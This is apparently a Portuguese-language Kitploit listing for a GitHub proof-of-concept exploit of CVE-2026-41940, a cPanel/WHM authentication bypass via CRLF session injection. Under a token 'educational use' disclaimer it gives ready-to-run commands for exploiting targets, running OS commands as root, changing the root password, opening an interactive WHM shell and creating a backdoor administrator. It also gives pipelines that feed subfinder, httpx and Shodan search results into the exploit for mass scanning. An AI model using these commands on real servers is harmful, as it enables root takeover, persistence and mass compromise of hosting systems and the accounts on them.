Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/lanicer/cve-2026-41940-poc
Autenticação e AutorizaçãoEscalada de PrivilégiosScanners de VulnerabilidadesMecanismos de PersistênciaAnálise de VulnerabilidadesExploração de Aplicações WebPós-ExploraçãoTestes de Penetração
GitHublanicer/cve-2026-41940-poc

cve-2026-41940-PoC

Explora o bypass de autenticação CVE-2026-41940 do cPanel/WHM via injeção de sessão CRLF para acesso não autenticado ao WHM em nível de root, depois lista contas, executa comandos do sistema operacional e abre um shell interativo para testes autorizados.

Ver Repositório
5329713há 2 diasRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-41940

⚠ Esta ferramenta foi criada exclusivamente para fins educacionais ou de bug bounty. O uso não autorizado fora de ambientes controlados é estritamente proibido.

Descrição

Uma ferramenta para explorar o CVE-2026-41940, uma falha crítica de bypass de autenticação no cPanel & WHM (CVSS 10.0), que permite a atacantes não autenticados obterem acesso root ao WHM ao injetar sequências CRLF em arquivos de sessão do lado do servidor por meio do cabeçalho Authorization — sem exigir credenciais.

Como funciona

O CVE-2026-41940, em termos gerais, é explorado por meio de uma falha na forma como o sistema lida com sessões de autenticação no cPanel/WHM. O ataque normalmente começa com uma requisição normal à interface de login, onde o aplicativo inicializa uma sessão prematuramente antes de validar completamente as credenciais do usuário. Devido ao tratamento inadequado de entradas relacionadas à sessão, certas estruturas de entrada malformadas ou inesperadas podem alterar a forma como os dados da sessão são armazenados ou interpretados pelo servidor.

Versões afetadas

VersionVulnerablePatched
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

Instalação(Windows/Mac OS)🔄

root@kitploit:~
git clone https://github.com/lanicer/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

Como usar

A ferramenta espera que um domínio alvo seja especificado.

Modo de alvo único:

root@kitploit:~
python cve.py -u https://target1.com:2083

Você também pode escanear a partir do arquivo target.txt (crie-o):

root@kitploit:~
python cve.py -l target.txt -t 50 -o result.json

Varredura básica:

Comandos disponíveis:

root@kitploit:~
python cve.py -u https://victim1.com:2083 # single target scan
python cve.py info -u https://victim1.com:2083 # Retrieves system information (version, load, disk usage).
python cve.py host -u https://victim1.com:2083 # Retrieves the hostname of the target server.

Ações de pós-exploração

root@kitploit:~
# List all accounts on the server
python cve.py list -u https://target.com:2087

# OS command
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# Get server info (hostname, disk, MySQL host)
python cve.py info -u https://target.com:2087

# Change root password
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# Interactive WHM shell
python cve.py shell -u https://target.com:2087

Pipelines

root@kitploit:~
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# From scope list
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# Multiple sources combined
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

Modo Shell WHM

Após uma execução bem-sucedida, você pode abrir um shell WHM interativo:

root@kitploit:~
python cve.py shell -u

Todos os comandos do shell

ComandoDescrição
idExibe o ID do usuário
hostnameObtém o hostname do servidor
accountsLista todas as contas de usuário
infoCarga, disco, host MySQL, versão
cat <path>Lê o conteúdo do arquivo
exec <cmd>Executa comando do sistema operacional
newadmin <user> <pass>Cria um administrador WHM backdoor
passwd <pass>Altera a senha do root
l [path]Lista o diretório
helpExibe todos os comandos
exitSai do modo shell

Referência da CLI

root@kitploit:~
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors

Aviso Legal

⚠ Esta ferramenta foi criada exclusivamente para fins educacionais ou de bug bounty. O uso não autorizado fora de ambientes controlados é estritamente proibido.

Baixar ferramenta